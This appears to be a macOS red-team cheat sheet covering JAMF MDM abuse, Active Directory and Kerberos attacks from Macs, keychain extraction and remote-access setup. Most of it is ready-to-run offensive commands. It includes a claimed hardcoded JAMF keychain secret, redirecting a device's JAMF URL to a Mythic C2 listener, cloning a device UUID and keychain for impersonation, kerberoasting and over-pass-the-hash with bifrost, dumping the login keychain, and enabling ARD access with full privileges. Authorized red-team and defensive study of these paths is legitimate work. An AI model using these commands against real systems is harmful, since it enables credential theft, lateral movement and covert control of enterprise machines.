Overview macOS red teaming differs significantly from Windows-focused engagements. Enterprise Macs are almost always managed by MDM solutions (JAMF, Kandji, Mosyle), frequently integrated with Active Directory, and often used with cloud service credentials. This page covers the most relevant attack paths.
This content is for authorized red team operations only. Always operate strictly within the defined scope of your engagement.
Abusing MDM Solutions Enumerating MDM Configuration # Check JAMF connectivity jamf checkJSSConnection # Find MDM enrollment profile profiles show -all # List MDM-managed configuration profiles profiles list
JAMF PRO Attacks
Check for self-enrollment at: https://<company-name>.jamfcloud.com/enroll/ If self-enrollment is enabled, it may ask for credentials. Use JamfSniper.py for password spraying.
JAMF Device Authentication Secrets
The jamf binary historically contained a shared keychain secret: jk23ucnq91jfu9aj JAMF persists as a LaunchDaemon at: /Library/LaunchAgents/com.jamf.management.agent.plist
The JAMF server URL is stored in: plutil -convert xml1 -o - /Library/Preferences/com.jamfsoftware.jamf.plist # Look for: <key>jss_url</key>
An attacker can drop a malicious package that overwrites this file, redirecting the device to a Mythic C2 listener: # After changing the URL, force immediate reconnection: sudo jamf policy -id 0
Requirements for impersonating JAMF communications:
Device UUID: ioreg -d2 -c IOPlatformExpertDevice | awk -F" '/IOPlatformUUID/{print $(NF-1)}'
JAMF keychain: /Library/Application Support/Jamf/JAMF.keychain (contains device certificate)
With these, create a VM with the stolen UUID and cloned keychain.
Harvesting Secrets from JAMF Scripts
Monitor /Library/Application Support/Jamf/tmp/ for custom admin scripts — they are placed, executed, and removed. They often contain credentials: # Monitor JAMF script arguments (no root needed) watch -n 1 'ps aux | grep -i jamf'
Use JamfExplorer.py to listen for new files and process arguments. Using MDM as C2 # Install mobileconfig enrollment file (requires root) # Typically delivered as pkg, auto-decompressed by Safari when downloaded as zip # Once enrolled, device trusts the MDM's SSL cert — can sign any payload # Mythic agent Orthrus uses this technique
Active Directory Integration Many macOS systems are bound to Active Directory. Standard AD enumeration applies, plus macOS-specific tools.
Domain Information echo show com.apple.opendirectoryd.ActiveDirectory | scutil dsconfigad -show
User Enumeration # Local users dscl . ls /Users dscl . read /Users/ < usernam e > # AD domain users dscl "/Active Directory/TEST/All Domains" ls /Users dscl "/Active Directory/TEST/All Domains" read /Users/ < usernam e > dscacheutil -q user # Computers dscl "/Active Directory/TEST/All Domains" ls /Computers # Groups dscl . ls /Groups dscl "/Active Directory/TEST/All Domains" ls /Groups # Domain info dsconfigad -show
MacHound BloodHound extension for macOS — collects AD relationships including CanSSH, CanVNC, and CanAE edges.
Bifrost Objective-C tool using native macOS Heimdal Kerberos APIs. No additional frameworks required on target.
Orchard JXA (JavaScript for Automation) tool for Active Directory enumeration from macOS.
Kerberos Attacks on macOS # Request TGT hash (PKINIT) bifrost --action askhash --username < nam e > --password < passwor d > --domain < domai n > # Over-Pass-The-Hash: request TGT bifrost --action asktgt --username < use r > --domain < domain.co m > \ --hash < has h > --enctype < enctyp e > --keytab /path/to/keytab # Kerberoast bifrost --action asktgs --spn < servic e > --domain < domain.co m > \ --username < use r > --hash < has h > --enctype < enctyp e > # Access shares with obtained tickets smbutil view //computer.fqdn mount -t smbfs //server/folder /local/mount/point
BloodHound MacHound Edges MacHound adds three new edges beyond standard HasSession and AdminTo:
Edge Meaning CanSSHEntity allowed to SSH to host CanVNCEntity allowed to VNC to host CanAEEntity allowed to execute AppleEvent scripts
Accessing the macOS Keychain The Keychain stores sensitive information that can facilitate lateral movement:
# List keychains security list-keychains # Dump login keychain (may trigger user prompt) security dump-keychain ~/Library/Keychains/login.keychain-db # Find specific passwords (prompts user unless already unlocked) security find-generic-password -l "service_name" -w security find-internet-password -s "server.example.com" -w # Unlock keychain (useful in non-interactive sessions) security unlock-keychain -p < passwor d > ~/Library/Keychains/login.keychain-db
External Service Integration macOS environments frequently use:
OneLogin — synchronized credentials across servicesGitHub, AWS — accessed via OneLoginOkta, Azure AD — SSO integration
Compromising macOS credentials often means compromising all connected cloud services simultaneously.
When a file is downloaded in Safari, “safe” file types are automatically opened . A downloaded ZIP is automatically decompressed, potentially exposing the user to malicious content without an explicit open action.
macOS Remote Access and Protocols # Check if SSH is running sudo launchctl list | grep ssh systemsetup -getremotelogin # Check VNC / ARD sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart \ -activate -configure -access -on -users admin -privs -all -restart -agent # Screen sharing netstat -an | grep 5900 # AirDrop / Bonjour dns-sd -B _airdrop._tcp
References 
